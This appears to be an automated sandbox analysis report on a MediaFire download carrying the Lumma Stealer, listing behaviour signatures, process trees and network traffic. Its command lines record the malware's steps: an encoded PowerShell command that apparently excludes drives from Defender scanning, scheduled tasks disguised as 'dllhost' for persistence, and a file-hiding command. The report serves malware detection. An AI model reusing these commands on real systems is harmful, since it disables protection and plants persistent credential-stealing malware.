Analysis Overview
Threat Level: Known bad
The file https://www.mediafire.com/folder/6q6psz38mqj7b was found to be: Known bad.
Malicious Activity Summary
Lumma Stealer
Downloads MZ/PE file
Executes dropped EXE
Reads user/profile data of web browsers
Loads dropped DLL
Checks computer location settings
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Checks installed software on the system
Power Settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
Command and Scripting Interpreter: PowerShell
Program crash
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Scheduled Task/Job: Scheduled Task
Enumerates system info in registry
Views/modifies file attributes
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-05 13:58
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-05 13:58
Reported
2024-07-05 14:01
Platform
win10v2004-20240704-en
Max time kernel
148s
Max time network
152s
Command Line
Signatures
Lumma Stealer
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\K3T1CRW47T00VJQDGK2TZ7USUH7.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\K3T1CRW47T00VJQDGK2TZ7USUH7.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\Installer.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5176 set thread context of 5028 | N/A | C:\Users\Admin\Downloads\Aura\Aura\Aura.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Downloads\Aura\Aura\Aura.exe |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/folder/6q6psz38mqj7b
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9c89f46f8,0x7ff9c89f4708,0x7ff9c89f4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2012 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2652 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5460 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5460 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5552 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4864 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5956 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6236 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6388 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4868 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6924 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7108 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7100 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7632 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6364 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6200 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5904 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6004 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7476 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7956 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7124 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,865266640970039227,7652453888412221815,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4764 /prefetch:2
C:\Users\Admin\Downloads\Aura\Aura\Aura.exe
"C:\Users\Admin\Downloads\Aura\Aura\Aura.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5176 -ip 5176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5176 -s 308
C:\Users\Admin\AppData\Local\Temp\K3T1CRW47T00VJQDGK2TZ7USUH7.exe
"C:\Users\Admin\AppData\Local\Temp\K3T1CRW47T00VJQDGK2TZ7USUH7.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p1404753551733818025492326517 -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "Installer.exe"
C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
"Installer.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjAE0AdwBSAEQAOAA2ADMATQBCACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMARABZAGEAOABKAE4AcQBIACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAEgAaQBzAEMAVAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB1AFQAMQBDAFIAOABjADYAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAE0AdwBSAEQAOAA2ADMATQBCACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMARABZAGEAOABKAE4AcQBIACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAEgAaQBzAEMAVAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB1AFQAMQBDAFIAOABjADYAIwA+AA=="
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk3605" /TR "C:\ProgramData\Dllhost\dllhost.exe"
C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk3605" /TR "C:\ProgramData\Dllhost\dllhost.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.mediafire.com | udp |
| US | 104.16.114.74:443 | www.mediafire.com | tcp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.114.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | static.mediafire.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| GB | 142.250.179.234:443 | ajax.googleapis.com | tcp |
| US | 8.8.8.8:53 | cdn.amplitude.com | udp |
| GB | 18.154.84.60:443 | cdn.amplitude.com | tcp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.amplitude.com | udp |
| US | 35.82.163.160:443 | api.amplitude.com | tcp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 216.239.34.36:443 | region1.analytics.google.com | tcp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| BE | 74.125.71.155:443 | stats.g.doubleclick.net | tcp |
| GB | 172.217.16.227:443 | www.google.co.uk | tcp |
| US | 8.8.8.8:53 | 72.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.84.154.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.39.156.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.163.82.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.34.239.216.in-addr.arpa | udp |
| BE | 74.125.71.155:443 | stats.g.doubleclick.net | udp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| GB | 172.217.16.227:443 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | 155.71.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 216.239.34.36:443 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.142.123.92.in-addr.arpa | udp |
| US | 216.239.34.36:443 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | connect.facebook.net | udp |
| IT | 157.240.203.2:443 | connect.facebook.net | tcp |
| US | 8.8.8.8:53 | translate.google.com | udp |
| GB | 172.217.169.78:443 | translate.google.com | tcp |
| US | 8.8.8.8:53 | 2.203.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | translate.googleapis.com | udp |
| GB | 216.58.201.106:443 | translate.googleapis.com | tcp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| US | 8.8.8.8:53 | 106.201.58.216.in-addr.arpa | udp |
| GB | 163.70.147.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | translate-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | 35.147.70.163.in-addr.arpa | udp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| GB | 142.250.179.234:443 | translate-pa.googleapis.com | udp |
| GB | 216.58.201.106:443 | translate-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | the.gatekeeperconsent.com | udp |
| US | 8.8.8.8:53 | btloader.com | udp |
| US | 104.21.42.32:443 | the.gatekeeperconsent.com | tcp |
| US | 104.22.74.216:443 | btloader.com | tcp |
| US | 8.8.8.8:53 | www.ezojs.com | udp |
| US | 104.21.63.106:443 | www.ezojs.com | tcp |
| US | 8.8.8.8:53 | privacy.gatekeeperconsent.com | udp |
| GB | 172.217.169.78:443 | translate.google.com | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 172.67.199.186:443 | privacy.gatekeeperconsent.com | tcp |
| US | 104.16.79.73:443 | static.cloudflareinsights.com | tcp |
| US | 8.8.8.8:53 | api.btloader.com | udp |
| US | 130.211.23.194:443 | api.btloader.com | tcp |
| US | 8.8.8.8:53 | ad-delivery.net | udp |
| US | 104.26.3.70:443 | ad-delivery.net | tcp |
| US | 104.26.3.70:443 | ad-delivery.net | tcp |
| US | 8.8.8.8:53 | cdn.otnolatrnup.com | udp |
| US | 104.16.52.110:443 | cdn.otnolatrnup.com | tcp |
| US | 8.8.8.8:53 | g.ezoic.net | udp |
| FR | 35.181.89.222:443 | g.ezoic.net | tcp |
| US | 8.8.8.8:53 | www.mediafiredls.com | udp |
| US | 8.8.8.8:53 | go.ezodn.com | udp |
| US | 130.211.23.194:443 | api.btloader.com | udp |
| US | 8.8.8.8:53 | 32.42.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.74.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.63.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.79.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.199.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.23.211.130.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.3.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.89.181.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.52.16.104.in-addr.arpa | udp |
| US | 172.67.73.78:443 | www.mediafiredls.com | tcp |
| US | 172.67.142.121:443 | go.ezodn.com | tcp |
